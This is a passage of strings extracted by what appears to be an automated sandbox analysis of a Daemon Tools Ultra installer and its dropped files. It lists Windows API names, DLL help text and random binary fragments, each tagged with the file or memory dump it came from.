FlushFileBuffers

Ansi based on Dropped File (Tages.dll.423655889)

FlushProcessWriteBuffers

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

fm8\GmJu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FmqW=x?7yS=

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FolderTypeID

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

For Each strSection In Split(objINIEdit.GetIniSectionNames(strProfilesFileName), vbNullChar)

Ansi based on Dropped File (start72urez3kr.vbs)

ForceQueue

Unicode based on Runtime Data (dtinst.exe )

ForceRemove

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

ForceUserModeCabCollection

Unicode based on Runtime Data (dtinst.exe )

FormatFS

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

FormatMessageW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

ForPlugAndPlayDevicesW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

FqsqsqsrLEuurxrxu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FreeEnvironmentStringsW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

FreeLibrary

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FreeLibraryWhenCallbackReturns

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

Friday

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

FsFKu?Fj$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FSWlq><2.[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FT<AMhPl;MOX

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Fu<t|K#:Baa.

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Function PRG_Isx64

Ansi based on Dropped File (start72urez3kr.vbs)

FVN@`=vt)s

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Fw,YQHo9]

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

fwqwqyryu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

fxHHHBB#&

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

FYZ`0h)C`[

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f{bTRF&Z>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

f{C[3~s}6c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g ?S[U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

G"@3OYkT

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g)8fy[I5z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g-Os{Z$zj

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g1n+V9]}m:T

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

G1UHA]C}$

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g60i9TsJM

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g7YIe;"/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g<7?Lx[nH

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

g]Fr #X*c

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Ga1Oo#/29

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Gac]NYRI

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

galCopyright

Unicode based on Dropped File (Tages.dll.423655889)

GDI32

Ansi based on Dropped File (JSSys3.dll.204366558)

GDI32.dll

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Generation

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

Get colors in use for GUI items.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get colors in use for GUI items.WW>

Ansi based on Dropped File (JSSys3.dll.204366558)

Get computer name.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get current user name.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get display bits per pixel .

Ansi based on Dropped File (JSSys3.dll.204366558)

Get display bits per pixel .WW'

Ansi based on Dropped File (JSSys3.dll.204366558)

get file info.

Unicode based on Dropped File (JSSys3.dll.204366558)

Get full path of installed program EXE.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get full path of installed program EXE.WWW>

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of key=value pairs for one INI section.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of key=value pairs for one INI section.WW@

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of keynames in one INI section.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get list of keynames in one INI section.WW#

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one Registry value - Str, Dword, Binary or XStr.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one Registry value - Str, Dword, Binary or XStr.WW^

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one value from INI file.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get one value from INI file.WW(

Ansi based on Dropped File (JSSys3.dll.204366558)

Get RAM installed and RAM currently in use.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get screen width and height.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get screen width and height.WW)

Ansi based on Dropped File (JSSys3.dll.204366558)

Get size and free space info. for drives.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of active window.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of all open, visible windows.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get title bar text of all open, visible windows.WW$

Ansi based on Dropped File (JSSys3.dll.204366558)

Get version and build of OS.

Ansi based on Dropped File (JSSys3.dll.204366558)

Get version and build of OS.WW+

Ansi based on Dropped File (JSSys3.dll.204366558)

Get width and height of Desk work area.

Ansi based on Dropped File (JSSys3.dll.204366558)

GetACP

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetActiveWindow

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetActiveWindowTitle

Ansi based on Dropped File (JSSys3.dll.204366558)

GetClassInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetClassInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetClientRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetColorDepthBPP

Ansi based on Dropped File (JSSys3.dll.204366558)

GetCommandLineA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetCommandLineW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetCompName

Ansi based on Dropped File (JSSys3.dll.204366558)

GetComputerNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetConsoleCP

Ansi based on Dropped File (imgengine.dll.62529018)

GetConsoleMode

Ansi based on Dropped File (Tages.dll.423655889)

GetCPInfo

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetCurrentDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetCurrentPackageId

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetCurrentProcess

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetCurrentProcessId

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetCurrentProcessorNumber

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetCurrentThread

Ansi based on Dropped File (imgengine.dll.62529018)

GetCurrentThreadId

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetCurUser

Ansi based on Dropped File (JSSys3.dll.204366558)

GetDateFormatEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetDC

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00407000.00000002.mdmp)

GetDefaultProgram

Ansi based on Dropped File (JSSys3.dll.204366558)

GetDesktopPixels

Ansi based on Dropped File (JSSys3.dll.204366558)

GetDesktopWindow

Ansi based on Dropped File (JSSys3.dll.204366558)

GetDeviceCaps

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetDiskFreeSpaceA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetDiskFreeSpaceExA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00409000.00000004.mdmp)

GetDiskFreeSpaceExW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetDiskFreeSpaceW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetDlgItem

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetDlgItemTextA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetDlgItemTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetDriveInfo

Ansi based on Dropped File (JSSys3.dll.204366558)

GetDriveTypeA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetEnvironmentStringsW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetEXEPath

Ansi based on Dropped File (JSSys3.dll.204366558)

GetExitCodeProcess

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileAttributesA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileInformationByHandleExW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetFileSize

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileType

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetFileVersionInfoA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFileVersionInfoSizeA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFileVersionInfoSizeW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetFileVersionInfoW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetForegroundWindow

Ansi based on Dropped File (JSSys3.dll.204366558)

GetFullPathNameA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetIniSectionKeys

Ansi based on Dropped File (JSSys3.dll.204366558)

GetIniSectionNames

Ansi based on Dropped File (JSSys3.dll.204366558)

GetIniSectionVals

Ansi based on Dropped File (JSSys3.dll.204366558)

GetLastActivePopup

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetLastError

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetLocaleInfoEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetLogicalDriveStringsA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetLogicalProcessorInformation

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetMemory

Ansi based on Dropped File (JSSys3.dll.204366558)

GetMessagePos

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetMessageW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetModuleFileNameA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetModuleFileNameExA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetModuleFileNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetModuleHandleA

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetModuleHandleW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetOEMCP

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetOpenFileNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetOpenFileNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetOpenWindowTitles

Ansi based on Dropped File (JSSys3.dll.204366558)

GetOpVersion

Ansi based on Dropped File (JSSys3.dll.204366558)

GetPEFile

Ansi based on Dropped File (JSSys3.dll.204366558)

GetPrivateProfileIntA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetPrivateProfileSectionA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetPrivateProfileStringA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetPrivateProfileStringW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetProcAddress

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetProcessHeap

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetProcessList

Ansi based on Dropped File (JSSys3.dll.204366558)

GetProcessWindowStation

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetProfileIntA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetProfileSectionA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetProfileStringA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetPropW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetRegFromCLSID

Ansi based on Dropped File (JSSys3.dll.204366558)

GetRegFromProgID

Ansi based on Dropped File (JSSys3.dll.204366558)

GetSaveFileNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetSaveFileNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetScreenPixels

Ansi based on Dropped File (JSSys3.dll.204366558)

GetShortPathNameA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetShortPathNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetStartupInfoW

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GetStdHandle

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetStringTypeW

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetSysColor

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetSystemColor

Ansi based on Dropped File (JSSys3.dll.204366558)

GetSystemDirectoryA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetSystemDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetSystemMenu

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetSystemMetrics

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

GetTempFileNameA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetTempFileNameW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetTempPathA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetTempPathW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetTextCB

Ansi based on Dropped File (JSSys3.dll.204366558)

GetTextCBWWW

Ansi based on Dropped File (JSSys3.dll.204366558)

GetThreadTimes

Ansi based on Dropped File (imgengine.dll.62529018)

GetTickCount

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetTickCount64

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetTimeFormatEx

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetTraceEnableLevel

Ansi based on Dropped File (Tages.dll.423655889)

GetTraceLoggerHandle

Ansi based on Dropped File (Tages.dll.423655889)

GetUserData

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetUserDefaultLocaleName

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF1000.00000020.mdmp)

GetUserDefaultUILanguage

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetUserNameA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetUserObjectInformationW

Ansi based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000001.42903.00DF1000.00000020.mdmp)

GetVersion

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetVersionExA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetVersionExW

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GetVolumeInformationA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetWindowDC

Ansi based on Dropped File (JSSys3.dll.204366558)

GetWindowLongA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetWindowLongW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetWindowRect

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetWindowsDirectoryA

Ansi based on Memory/File Scan (ChangeStartPage.exe , 00044920-00002492.00000000.45424.00407000.00000002.mdmp)

GetWindowsDirectoryW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GetWindowTextA

Ansi based on Dropped File (JSSys3.dll.204366558)

GetWindowTextW

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

GetWindowThreadProcessId

Ansi based on Dropped File (JSSys3.dll.204366558)

gF15cI9 B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Gf_~|WjTF

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

ghtText

Unicode based on Dropped File (JSSys3.dll.204366558)

GJ?I@delt

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GlobalAlloc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GlobalFree

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GlobalLock

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GlobalMemoryStatus

Ansi based on Dropped File (JSSys3.dll.204366558)

GlobalReAlloc

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GlobalSession

Unicode based on Runtime Data (dtinst.exe )

GlobalSign nv-sa1'0%

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

GlobalSize

Ansi based on Memory/File Scan (nsCDD1.tmp , 00037985-00003668.00000000.38487.10002000.00000002.mdmp)

GlobalUnlock

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

glP1+'0,>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GpSvcDebugLevel

Unicode based on Runtime Data (dtinst.exe )

gq(ph

Ansi based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

grabber

Unicode based on Dropped File (Tages.dll.423655889)

GradientActiveTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

GradientInActiveTitle

Unicode based on Dropped File (JSSys3.dll.204366558)

GTG 77mwd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

guments

Unicode based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

Guz0b?]t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

gXM>\;D~_Z

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

gz*;(YFIf0f

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Gzs}\*:3Av>

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

GzTZ|Jtg]AL

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

G~oBV29Wd

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h'%Vn<|A

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H($~D%IP

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H19Pd&{@%9B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H2[;WkpN`

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h2}OuJ\xm

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h3l8/du'

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H59*f}c+t

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H8E;VTRLQ

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H<#AIh'Y ~{

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H=R2#t}A/

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H>:t8\/lRq

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

h>F<>N;#B

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H@VkDC|{D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

H_M,,e

Ansi based on Image Processing (screen_4.png)

H_MMTe

Ansi based on Image Processing (screen_4.png)

haja`VaPPPOQ__]_s_D

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hao@-b*,|

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

haob`bbPQs_nssss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

haqhabd`n

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HasNavigationEnum

Unicode based on Runtime Data (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe )

HDDDDFFFFFFFrFrrrsss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

hdojPbePPWW_ss_sss

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HeaderDigest

Unicode based on Hybrid Analysis (DiscSoftBusService.exe , 00039405-00003708.00000000.39905.00DF0000.00000002.mdmp)

HeapAlloc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

HeapCreate

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

HeapDestroy

Ansi based on Dropped File (Tages.dll.423655889)

HeapFree

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

HeapReAlloc

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe , 00017855-00001172.00000002.24349.00409000.00000004.mdmp)

HeapSetInformation

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

HeapSize

Ansi based on Memory/File Scan (dtinst.exe , 00040010-00003808.00000000.40510.00847000.00000002.mdmp)

HEEDEEDFHFFG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HEEFFEFFGGFG

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

Hex8M%I$Q

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HFkaWS%U

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HFtAjZK$]V

Ansi based on Memory/File Scan (Daemon.Tools.Ultra.v3.0.0.0309_P30i.ir.exe.bin)

HH:mm:ss

